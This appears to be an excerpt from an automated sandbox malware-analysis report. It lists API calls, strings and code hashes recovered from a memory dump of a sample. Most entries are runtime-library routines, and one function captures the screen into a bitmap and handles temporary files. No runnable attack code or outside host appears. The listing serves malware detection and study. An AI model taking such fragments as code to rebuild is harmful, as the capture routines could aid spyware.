                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                        • String ID:
                                                        • API String ID: 2444527052-0
                                                        • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                        • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                        • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                        • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: InfoLocale
                                                        • String ID: 11@$GetLocaleInfoEx
                                                        • API String ID: 2299586839-1075713910
                                                        • Opcode ID: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                        • Instruction ID: 0b6d0ab79e82c81e80324b5502c8e0aaa0a052425b201476cea76cb6f5b2798d
                                                        • Opcode Fuzzy Hash: 1dc130b9c5a187b3ffa5c8ddbc84a9ec177ca7c052edae5696fe3086fb7fd6c3
                                                        • Instruction Fuzzy Hash: 10F0BB31680318BBDB11AF51DC02F6F7B65EF19B12F10416BFC0566290DA759D20EA9E
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                        • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                        • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                        • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                        • GetClientRect.USER32(?,?), ref: 00402166
                                                        • GetDC.USER32(?), ref: 0040216D
                                                        • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                        • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                        • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                        • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                        • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                        • _wcslen.LIBCMT ref: 0040229B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                        • String ID: Tahoma
                                                        • API String ID: 3832963559-3580928618
                                                        • Opcode ID: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                        • Instruction ID: 010c8dd0ade12b0eef00d8562bcf10ebda5dfd6cd9d9fcac1ad08c501085cdf2
                                                        • Opcode Fuzzy Hash: abba52d6847b12fe0ef92b8c09c3f71f9fb3bd9472e68441846bf1e5ef91a6b5
                                                        • Instruction Fuzzy Hash: E871FD72900228AFDB22DF64DD85FAEB7BCEB09B11F0041A5B609E6151DA74AF81CF14
                                                        APIs
                                                        • DestroyWindow.USER32(?), ref: 004025ED
                                                        • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                        • ReleaseCapture.USER32 ref: 00402612
                                                        • GetDC.USER32(00000000), ref: 00402639
                                                        • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                        • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                        • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                        • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                        • DeleteFileW.KERNEL32(?), ref: 00402751
                                                        • DeleteDC.GDI32(00000000), ref: 00402758
                                                        • DeleteObject.GDI32(00000000), ref: 0040275F
                                                        • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                        • DestroyWindow.USER32(?), ref: 00402774
                                                        • SetCapture.USER32(?), ref: 004027C1
                                                        • GetDC.USER32(00000000), ref: 004027F5
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                        • GetKeyState.USER32(0000001B), ref: 00402818
                                                        • DestroyWindow.USER32(?), ref: 0040282D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                        • String ID: gya
                                                        • API String ID: 2545303185-1989253062
                                                        • Opcode ID: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                        • Instruction ID: e71ef6788f7482d4de425a52166adb2a5dd74d508ff262b25753fab110ccc0fb
                                                        • Opcode Fuzzy Hash: 801bb6c124e375a82d20db098403c515f414ac510bec6d128129a9fc28d47c56
                                                        • Instruction Fuzzy Hash: 926181B5900209AFCB289F64ED48FAA7BB9FF49706F144179F605A22A2D774C941CF1C
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        • Opcode ID: c37e14c16bc5e7a46ee425391025bd4e04b88596c533a8b7e5414dd032cd7fb9
                                                        • Instruction ID: ea2a752c51db2b1f33c6fb20177c4d444c994d8588285db844449b2f99ea92ea
                                                        • Opcode Fuzzy Hash: c37e14c16bc5e7a46ee425391025bd4e04b88596c533a8b7e5414dd032cd7fb9
                                                        • Instruction Fuzzy Hash: 7AB1C371A002159FDB11DF6AD841BEEB7F4FF18304F54452FE485AB342D77AA8418B14
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                          • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                        • _free.LIBCMT ref: 0043A651
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043A673
                                                        • _free.LIBCMT ref: 0043A688
                                                        • _free.LIBCMT ref: 0043A693
                                                        • _free.LIBCMT ref: 0043A6B5
                                                        • _free.LIBCMT ref: 0043A6C8
                                                        • _free.LIBCMT ref: 0043A6D6
                                                        • _free.LIBCMT ref: 0043A6E1
                                                        • _free.LIBCMT ref: 0043A719
                                                        • _free.LIBCMT ref: 0043A720
                                                        • _free.LIBCMT ref: 0043A73D
                                                        • _free.LIBCMT ref: 0043A755
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                        • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                        • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 013650646774c5b7c47304d050aae00879c41c2523e9e3a904d24d31b9884639
                                                        • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                        • Opcode Fuzzy Hash: 013650646774c5b7c47304d050aae00879c41c2523e9e3a904d24d31b9884639
                                                        • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                        APIs
                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                          • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                        • String ID: 11@$pContext$switchState
                                                        • API String ID: 3151764488-3851367110
                                                        • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                        • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-2461957735
                                                        • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                        • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                        • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                        • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                        • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                        • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                        • SafeRWList.LIBCONCRT ref: 004197B8
                                                          • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                          • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                        • GetLastError.KERNEL32 ref: 004197D9
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                        • String ID: eventObject
                                                        • API String ID: 1999291547-1680012138
                                                        • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                        • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                        • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                        • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                        APIs
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415269
                                                          • Part of subcall function 00414C7A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C8E
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415292
                                                          • Part of subcall function 004130F4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00413110
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004152B9
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415173
                                                          • Part of subcall function 00413158: __EH_prolog3_GS.LIBCMT ref: 0041315F
                                                          • Part of subcall function 00413158: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041316E
                                                          • Part of subcall function 00413158: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413175
                                                          • Part of subcall function 00413158: GetCurrentThread.KERNEL32 ref: 0041319D
                                                          • Part of subcall function 00413158: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 004131A7
                                                        • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415194
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151CB
                                                        • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0041520E
                                                        • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00415301
                                                        • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415325
                                                        • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415332
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                        • String ID:
                                                        • API String ID: 64082781-0
                                                        • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction ID: 3c4a00c01101e3417d492a63c26e06d94b1efbede92b5aee1480a2ddfdefe69c
                                                        • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                        • Instruction Fuzzy Hash: A3618D71A00715DFDB18CFA5E8926EEB7B1FB84316F24806ED45697252C738A981CF4C
                                                        APIs
                                                        • _free.LIBCMT ref: 00431E1A
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 00431E26
                                                        • _free.LIBCMT ref: 00431E31
                                                        • _free.LIBCMT ref: 00431E3C
                                                        • _free.LIBCMT ref: 00431E47
                                                        • _free.LIBCMT ref: 00431E52
                                                        • _free.LIBCMT ref: 00431E5D
                                                        • _free.LIBCMT ref: 00431E68
                                                        • _free.LIBCMT ref: 00431E73
                                                        • _free.LIBCMT ref: 00431E81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                        • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                        • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID: f(@$f(@
                                                        • API String ID: 4189289331-2391611762
                                                        • Opcode ID: 2396ca184a0ea6fadd607c802ee38f20c1982d3dd3cdaf5b94a241f1a857116a
                                                        • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                        • Opcode Fuzzy Hash: 2396ca184a0ea6fadd607c802ee38f20c1982d3dd3cdaf5b94a241f1a857116a
                                                        • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                        APIs
                                                        • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                        • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                        • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                        • String ID: 11@$@fB$csm
                                                        • API String ID: 1170836740-1464837749
                                                        • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                        • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                        • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                        APIs
                                                          • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                          • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                          • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                        • _free.LIBCMT ref: 004311FD
                                                        • _free.LIBCMT ref: 00431216
                                                        • _free.LIBCMT ref: 00431248
                                                        • _free.LIBCMT ref: 00431251
                                                        • _free.LIBCMT ref: 0043125D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_memcmp
                                                        • String ID: 11@
                                                        • API String ID: 4275183328-1785270423
                                                        • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                        • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                        • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                        • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-316725708
                                                        • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                        • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                        • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                        • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                        • __alloca_probe_16.LIBCMT ref: 004321E6
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                        • __alloca_probe_16.LIBCMT ref: 004322CB
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                        • __freea.LIBCMT ref: 0043233B
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        • __freea.LIBCMT ref: 00432344
                                                        • __freea.LIBCMT ref: 00432369
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3864826663-0
                                                        • Opcode ID: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                        • Instruction ID: a5f38111fa01d07f603b669534a8c8f44d85fc048aacd33138e2e818ffff9497
                                                        • Opcode Fuzzy Hash: b11f90d838427d37edd64e38e717b3af24babdf9d4b4099e4006f2966c914547
                                                        • Instruction Fuzzy Hash: B8513672600606AFDB258F75CD81EBF37A9EB48754F24426AFD04E6250DBBCDC40C658
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: cb4d3308ea5a93ba8490e2e938d95f7beab743b864a9d83c10aec8bd6e5a7d8e
                                                        • Instruction ID: 1cba7b180e09f8073ff63dd7a5e39a9331c2ed4ff1a144fb7a18fbb91be6d7aa
                                                        • Opcode Fuzzy Hash: cb4d3308ea5a93ba8490e2e938d95f7beab743b864a9d83c10aec8bd6e5a7d8e
                                                        • Instruction Fuzzy Hash: 0761F071900205AFDB24DF69C842B9ABBF4EF09710F10516BE884EB382E7799E418B59
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(?,0042C25D,E0830C40,?,?,?,?,?,?,00434018,0040DDFA,0042C25D,?,0042C25D,0042C25D,0040DDFA), ref: 004338E5
                                                        • __fassign.LIBCMT ref: 00433960
                                                        • __fassign.LIBCMT ref: 0043397B
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,0042C25D,00000001,?,00000005,00000000,00000000), ref: 004339A1
                                                        • WriteFile.KERNEL32(?,?,00000000,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339C0
                                                        • WriteFile.KERNEL32(?,0040DDFA,00000001,00434018,00000000,?,?,?,?,?,?,?,?,?,00434018,0040DDFA), ref: 004339F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
